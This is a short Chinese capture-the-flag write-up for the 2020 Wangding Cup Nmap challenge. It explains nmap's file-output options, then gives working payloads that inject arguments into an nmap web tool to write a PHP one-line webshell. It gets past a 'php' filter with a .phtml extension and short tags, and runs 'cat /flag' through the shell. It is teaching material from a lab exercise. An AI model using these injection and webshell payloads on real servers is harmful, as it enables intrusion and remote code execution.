【nmap写入一句话木马】网鼎杯 2020 朱雀组 Nmap WriteUp

本文最后更新于:2021年8月18日下午1点40分

前景知识

BUUCTF2018 Online Tool是类似的,使用nmap写入一句话木马,下面贴一个链接:

nmap:

nmap的文件写入:

  • -oN 标准保存
  • -oX XML保存
  • -oG Grep保存
  • -oA 保存到所有格式
  • -append-output 补充保存文件

nmap常规利用

1
2
3
4
5
6
7
nmap -T5 -sT -Pn --host-timeout 2 -F 

-T5: 即Insane模式,适合快速的网络或者不在意丢失默些信息,对每台主机的超时限制为75秒,对每次探测只等待0.3秒
-sT: TCP连接扫描
-Pn: 无Ping扫描,可以躲避防火墙防护,可以在目标主机禁止ping的情况下使用
-F : 快速扫描
-oG: nmap -F -oG test.txt 192.168.23.1 将扫描结果保存到test.txt

WriteUp:

打开题目,页面如下:

image-20210724134600216

是一个nmap的工具

尝试使用BUUCTF2018 Online Tool 的题目的payload

1
' <?php @eval($_POST["hack"]);?> -oG hack.php '

image-20210724134718340

回显Hacker

经过调试后发现,过滤了php字样,解决方案如下:

  • 对于php后缀,使用phtml绕过
  • 对于php内容,可以使用短标签绕过

将payload修改如下:

1
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

访问hack.phtml页面

image-20210724134931913

可以到看已经成功写入了,post传参

1
hack=system("cat /flag");

image-20210724135011976

得到flag:flag{54e20b64-0038-4261-bdd0-106e80cc8101}